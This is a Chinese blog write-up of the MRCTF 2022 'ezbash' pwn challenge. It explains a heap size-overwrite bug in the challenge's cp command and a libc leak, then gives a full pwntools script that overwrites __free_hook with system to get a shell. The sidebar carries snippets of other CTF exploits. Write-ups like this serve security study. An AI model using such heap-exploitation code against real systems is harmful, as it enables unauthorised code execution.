2022 MRCTF pwn ezbash

已于 2022-04-25 10:15:24 修改
阅读量575 收藏 1
点赞数
分类专栏: PWN 文章标签: pwn 安全 网络安全
于 2022-04-25 08:24:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46483787/article/details/124396324
版权

昨天打的mrctf上的一道题,大概数了一下有十几个解吧,算是签到题

题目给出了一个程序,运行起来之后是一个bash环境,但是里面的文件都是堆上的内存。拿到题目之后首先分析一下文件结构体:
在这里插入图片描述

这里写的稍微有点问题,其实标志位是前四位,然后file_name的offset为4到20,20到24是这四个字节没有用,是空的,不过懒得改了,凑活着看吧

其中标志位标识当前chunk是一个文件还是一个文件夹

其他函数具体怎么逆向过程就不说了,好麻烦
如果在逆向上卡住的可以给我发私信,我把逆完的i64发你

然后看下洞在哪:
在这里插入图片描述

这个题在echo的时候malloc的值是固定的,但是在复制文件内容的时候,如果dest的content是空的则会根据src的content长度来进行malloc,这里有两个地方比较好,一个是malloc的大小很好控制,只需要在src文件输入指定长度的内容,然后再cp一下就行,第二个是有一个size覆盖,如果malloc(0x18),并且内容写满,那么在计算strlen的时候就会把下一个chunk的size也计算进去,然后再strncpy的时候就会用src堆块的下一个chunk的size,覆盖掉dest堆块的下一个chunk的size,可以利用这个造成一个堆块重叠。

最后再简单说说泄露libc,其实很好泄露,通过echo获取unsortedbin,然后在cp的时候控一下,执行malloc(8),然后strcpy8个a过去,再打印就可以把libc地址带出来了

from pwn import *
from ctypes import *
#io = process('./pwn')
io = remote('140.82.17.215', 23595 )
libc = ELF('./libc-2.31.so')
rl = lambda    a=False        : io.recvline(a)
ru = lambda a,b=True    : io.recvuntil(a,b)
rn = lambda x            : io.recvn(x)
sn = lambda x            : io.send(x)
sl = lambda x            : io.sendline(x)
sa = lambda a,b            : io.sendafter(a,b)
sla = lambda a,b        : io.sendlineafter(a,b)
irt = lambda            : io.interactive()
dbg = lambda text=None  : gdb.attach(io, text)
# lg = lambda s,addr        : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
lg = lambda s            : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
uu32 = lambda data        : u32(data.ljust(4, b'\x00'))
uu64 = lambda data        : u64(data.ljust(8, b'\x00'))
def cmd(command):
	io.sendline(command)
def read(file,context):
	cmd("echo "+context+" -> "+file)
cmd("touch 0 1 2 3 4 5 6 7 8 9 a b c d e")
read('e','a'*0x110)
read('1','a'*0x500)
read('2','a'*8)
cmd("cp 2 3")
cmd("cat 3")
ru('a'*8)
libcbase=u64(io.recv(6).ljust(8,'\x00'))-(0x7feccf7f9be0-0x7feccf60d000)
lg("libcbase")
free_hook=libcbase+libc.sym['__free_hook']
system=libcbase+libc.sym['system']
read('2','a'*0x38)
cmd("cp 2 4")
cmd("cp e 5")
cmd("cp 2 6")
cmd("touch h")
cmd("cp 2 8")
cmd("cp 2 9")
cmd("cp 9 4")
cmd("cp 0 8")
cmd("cp 0 6")
cmd("cp 0 5")
payload='a'*0x120+p64(free_hook-0x30)[:6]
read('h',payload)
read('2','a'*0x30+p64(system)[:6])
cmd("cp 2 a")
cmd("cp 2 b")
cmd("/bin/sh")
irt()

在这里插入图片描述

Ayakaaaa
关注
专栏目录
2020MRCTF - 部分Pwn
weixin_44864859的博客
04-09 339
easyoverflow 保护全开,但这里只需要栈溢出覆盖数据满足check函数判断就好了。 exp: from pwn import * context.log_level = 'debug' p = remote('38.39.244.2',28082) payload="a"*48 + "n0t_r3@11y_f1@g" p.sendline(payload) p.interacti...
2022ISCC PWN
山高路远
07-05 2184
2022ISCC
2022MRCTF-wp
qq_45603443的博客
04-27 913
2022MRCTF-wpWebJust HackingGod_of_GPAWebCheckInJava_mem_shell_BasicJava_mem_shell_FilterMiscpddConnecting...Tip Web Just Hacking 爆出密码foobared redis getshell 在root目录docker config发现账号密码。 登录发现私有镜像 本地运行getflag God_of_GPA 笔记页面有dom xss 认证的地方存在xss 可把token发到其他地
MRCTF2022 writeup】
weixin_45751765的博客
04-26 590
1NDEX0x00 前言WebWebCheckInBonusJava_mem_shell_BasicJust HackingJava_mem_shell_FilterMISCCheckinPDD0x01 rethink 0x00 前言 这把打的太菜了… 没出什么有思考的题目,好好复现吧 贴个团队writeup水一下 Web WebCheckIn 文件上传点会解析php 直接system反弹shell 翻到flag Bonus Java_mem_shell_Basic Tomcat默认密码tomcat/to
[MRCTF 2022]web题目复现
cosmoslin的博客
04-27 1592
WEB webcheckin 一个文件上传点,可以上传webshell但是有检测,这里用二进制绕过 <?php class KUYE{ public $DAXW = null; public $LRXV = null; function __construct(){ $this->DAXW = '1100101 1110110 1100001 1101100 101000 100100 1011111 1010000 10011
*CTF 2022 pwn examination
weixin_46483787的博客
04-17 506
题目主要实现了两个角色,每个角色四五个功能,漏洞点主要有以下几点: 当学生的question_number为1,并且pray过一次,老师在给分的时候就会扣十分,由于question_number为1,所以分数会模10,即小于10,减10之后发生负溢出,变成个很大的数。 从而可以进入这里的功能: 这里可以泄露堆地址,并且可以让一个已知地址指向的值加一 然后是这里: 这里可以修改一个堆地址的低1字节,从而修改堆块结构,将下一个chunk的size改大,释放后将libc内地址踩进可控堆块,泄露libc。 然
2022 CISCN 初赛pwn完整wp
weixin_46483787的博客
06-09 2264
2022 CISCN 初赛pwn的完整wp
MTCTF2022-pwn
m0_51185908的博客
10-04 725
MTCTF2022-PWN
强网杯2022 pwn 赛题解析.docx
最新发布
12-18
【强网杯2022 Pwn赛题解析】 在网络安全竞赛“强网杯”中,Pwn类赛题往往考验参赛者对内存安全漏洞利用的理解和技术应用。本题涉及的是一道基于高版本glibc的House of Apple攻击,这是一种利用大型bin(large bin)...
VNCTF2022_Pwn_clear_got_WP
weixin_56434818的博客
02-14 870
VNCTF2022_Pwn_clear_got_WP 文章目录VNCTF2022_Pwn_clear_got_WP检查文件IDA查看题给elf文件利用思路exp 检查文件 RELRO半开,没有canary,开NX,没开PIE。 IDA查看题给elf文件 int __cdecl main(int argc, const char **argv, const char **envp) { char buf[92]; // [rsp+0h] [rbp-60h] BYREF int v5; // [rsp
PCI-passthrough-ez-bash-scripts-:此存储库有2个脚本,一个用于快速启用pci直通,另一个用于删除pci直通设置
02-13
PCI-passthrough-ez-bash-scripts- 出于某种原因在linux中玩游戏。 但是在ez上直接在linux上直接玩一些游戏仍然很困难,并且可以安全地在qemu vm内玩<br>此脚本用于ez自动化,无需任何细节即可获得pci-passthrough。 对安全有用 启用pci直通是一个重大的安全缺陷(个人信念)。 如果您出于其他原因使用vms,请进行以下操作:<br>这些脚本主要用于快速启用/禁用pci -passthrough,以便您不必为游戏而永远启用pci-passthrough
mrctf-wp- re
令则
03-30 1111
mrctf-wp re pwn 题目贼棒,出题师傅们tql! 其他题目都不会,猜的 比赛的id: 1ing23 - 文章目录mrctf-wpreTransformPixelShooterlolhello_world_goJunkHard-to-goShitEasyCppVirtual TreepwneasyoverflowshellcodeEasy_equationcryptokeyboar...
[*CTF 2022 pwn] examination
weixin_52640415的博客
04-17 585
抽空参加个比赛,水平有限只作了一道题,但还是要记录一下,毕竟好多人还0解呢。学渣的逆袭。 英文写的是ret2shool 这个跟ret2XXX的没关系。 代码长了读程序就麻烦,慢慢读把函数功能整理如下(叫法随个人理解,英文看单词不认识): 教师菜单 增加学生:增加一个学生结构,管理块chunk :0x28含指向成绩单:stud{ptr_s,0,0,0,0} 成绩单chunk:0x18含学生评级,成绩,评价指针,评价长度 s{int idx,int score, ptr_prv,int x,int pr
NahamCon CTF 2022 pwn 部分writeup
z1r0的博客
05-02 1001
NahamCon CTF 2022 pwn writeup Babiersteps ret2text from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m') ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b
[BUUCTF]PWN——mrctf2020_shellcode
mcmuyanga的博客
01-08 1403
mrctf2020_shellcode 附件 步骤: 例行检查,64位程序,开启了relro和pie,没有nx,肯定是用shellcode最方便了 本地试运行一下,看看大概的情况 64位ida载入,根据运行时看到的字符串,迅速定位到关键程序,但是没法f5成伪代码,直接看汇编 栈大小是0x410,读入了0x400,无法造成溢出覆盖返回地址 不过好像这边分析了用处也不大,直接利用pwntools生成shellcode发送即可 shellcode=asm(shellcraft.sh()) exp fr
2022 vnctf pwn clear_got
yongbaoii的博客
03-15 884
got表能覆写 没有canary pie 程序的逻辑很简单 一个栈溢出之后将got表全部清空。 给了两个系统调用。 那么我们的解题思路。 首先利用ret2csu来控制寄存器 payload = "a"*0x68 payload += p64(0x4007ea) payload += p64(0xc01c8) #rbx payload += p64(0xc01c9) #rbp payload += p64(0) #r12 payload += p64(59) #rdx payload += p64(0
HackPack CTF 2022 WriteUp
04-09 989
文章目录pwn-Terminal Overdriveweb-Imported Kimchi 1web-Imported Kimchi 2rev-3T PHON3 HOM3rev-Self-Hosted Cryptorev-Shopkeeper 1rev-Shopkeeper 2rev-Shopkeeper 3 pwn-Terminal Overdrive # -*- coding: utf-8 -*- from pwn import * r = remote('cha.hackpack.club',1099
2022 TQLCTF pwn easyvm
yongbaoii的博客
02-22 633
题目很有意思,肝了不少时间。
[MRCTF2020]Xor
qq_37439229的博客
04-13 1404
buuctf [MRCTF2020]Xor 无聊又来水博客了。。。。 打开od看看汇编,cmp edx 0x1b,知道字符串长度为27,之后与自己的序号xor,对比的数在栈里很容易发现 a="MSAWB~FXZ:J:`tQJ\"N@ bpdd}8g" >>> for i in range(len(a)): ... print chr(i^ord(a[i])), 直接出来,...
二进制利用入门:Pwn挑战解析
"Introduction-to-Pwn.pdf - pwn学习手册" 在网络安全领域,"pwn"是一种专门针对二进制漏洞利用的技术,它涉及到如何利用软件中的安全漏洞来控制或破坏系统。"Introduction to Pwn"这份手册是为那些对中级到高级的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值